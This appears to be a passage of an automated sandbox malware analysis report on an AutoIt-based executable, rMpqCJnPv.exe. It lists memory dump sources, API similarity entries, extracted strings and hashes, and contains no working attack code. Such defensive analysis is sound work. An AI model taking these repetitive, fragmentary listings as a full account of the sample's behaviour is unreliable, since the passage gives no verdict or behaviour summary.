• Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2267087916-0
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$socket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1881357543-0
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3321077145-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352109105-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3076010158-0
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1463438336-0
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7BB81A27B,?,?,?,00007FF7BB81A236), ref: 00007FF7BB823DB1
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7BB81A27B,?,?,?,00007FF7BB81A236), ref: 00007FF7BB823E13
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7BB81A27B,?,?,?,00007FF7BB81A236), ref: 00007FF7BB823E4D
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7BB81A27B,?,?,?,00007FF7BB81A236), ref: 00007FF7BB823E77
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1557788787-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 847901565-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2864067406-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                    • String ID: cdecl
                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 837644225-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3970641297-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 697997973-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2979156933-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 357397906-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352324309-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1447195878-0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2875609808-0
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3974789173-0
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2889604237-0
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2889604237-0
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: gfffffff
                                                                                                                    • API String ID: 3215553584-1523873471
                                                                                                                    Similarity
                                                                                                                    • API ID: ContainedObject
                                                                                                                    • String ID: AutoIt3GUI$Container
                                                                                                                    • API String ID: 3565006973-3941886329
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: e+000$gfff
                                                                                                                    • API String ID: 3215553584-3030954782
                                                                                                                    Similarity
                                                                                                                    • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe
                                                                                                                    • API String ID: 3307058713-1611202206
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 3467290483-2160076837
                                                                                                                    • Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                                                                    • Instruction ID: bdc795b230ec945f6a77ac997a629971aad17f9692af49561a47e7c8a5512b72
                                                                                                                    • Opcode Fuzzy Hash: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                                                                    • Instruction Fuzzy Hash: F3413E325086C287D670AF29E4447AEB7A1FB95790F504135EFE903AA9DF3CE481CB50
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                                    • String ID: 255.255.255.255
                                                                                                                    • API String ID: 2496851823-2422070025
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintf
                                                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                    • API String ID: 3988819677-2584243854
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateMessageObjectSendStock
                                                                                                                    • String ID: $SysTabControl32
                                                                                                                    • API String ID: 2080134422-3143400907
                                                                                                                    Similarity
                                                                                                                    • API ID: FileHandleType
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 3000768030-2766056989
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                    • String ID: Combobox
                                                                                                                    • API String ID: 1025951953-2096851135
                                                                                                                    Similarity
                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                    • String ID: edit
                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                    Similarity
                                                                                                                    • API ID: _handle_error
                                                                                                                    • String ID: "$pow
                                                                                                                    • API String ID: 1757819995-713443511
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3712363035-3916222277
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                    • String ID: !$tan
                                                                                                                    • API String ID: 3384550415-2428968949
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                    • String ID: !$cos
                                                                                                                    • API String ID: 3384550415-1949035351
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                    • String ID: !$sin
                                                                                                                    • API String ID: 3384550415-1565623160
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _handle_error
                                                                                                                    • String ID: "$exp
                                                                                                                    • API String ID: 1757819995-2878093337
                                                                                                                    APIs
                                                                                                                    • try_get_function.LIBVCRUNTIME ref: 00007FF7BB8075E9
                                                                                                                    • TlsSetValue.KERNEL32(?,?,?,00007FF7BB807241,?,?,?,?,00007FF7BB80660C,?,?,?,?,00007FF7BB804CD3), ref: 00007FF7BB807600
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Valuetry_get_function
                                                                                                                    • String ID: FlsSetValue
                                                                                                                    • API String ID: 738293619-3750699315
                                                                                                                    APIs
                                                                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7BB805629
                                                                                                                    • _CxxThrowException.LIBVCRUNTIME ref: 00007FF7BB80563A
                                                                                                                      • Part of subcall function 00007FF7BB807018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7BB80563F), ref: 00007FF7BB80708D
                                                                                                                      • Part of subcall function 00007FF7BB807018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7BB80563F), ref: 00007FF7BB8070BF
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                                    • String ID: Unknown exception
                                                                                                                    • API String ID: 3561508498-410509341
                                                                                                                    • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                                                    • Instruction ID: 4f3d3bbc77652a93afbba393f43d720c097d66a112be85d8992adf0256d1f591
                                                                                                                    • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                                                    • Instruction Fuzzy Hash: 8DD01726A18A86D1DE10FB0CD8953A8E370FBA1348FD04431EB4C425B9EF2CD65AD3A0